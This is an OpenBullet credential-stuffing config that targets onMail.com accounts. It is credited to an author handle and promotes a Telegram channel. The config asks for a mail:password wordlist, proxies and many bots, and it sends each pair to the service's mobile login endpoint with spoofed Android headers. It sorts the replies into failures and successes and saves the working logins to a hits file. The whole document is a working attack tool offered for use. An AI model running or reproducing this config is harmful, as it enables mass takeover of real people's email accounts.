[SETTINGS]
{
  "Name": "onMail.com",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2023-11-18T15:02:49.0057354+03:30",
  "AdditionalInfo": "Telegram Channel: t.me/OpenBulletChannel | Save Hits | CPM Rate: 100-1000",
  "RequiredPlugins": [],
  "Author": "@TheOwn",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://mail.onmail.com/v1/m/login" 
  
  HEADER "x-Auth-User: <USER>" 
  HEADER "User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; ASUS_Z01QD Build/PI) Email/1.47.11 Platform/android" 
  HEADER "X-Device-Token: 58713ce3-5255-34eb-8d5c-7170eaea96e7" 
  HEADER "x-Auth-Password: <PASS>" 
  HEADER "Host: mail.onmail.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Username or password does not match" 
    KEY "401" 
  KEYCHAIN Success OR 
    KEY "{\"status\":200," 

#SS UTILITY File "OnMail.com Acc.txt" AppendLines "<USER>:<PASS> | Telegram Channel: @OpenBulletChannel" -> VAR "SS" 

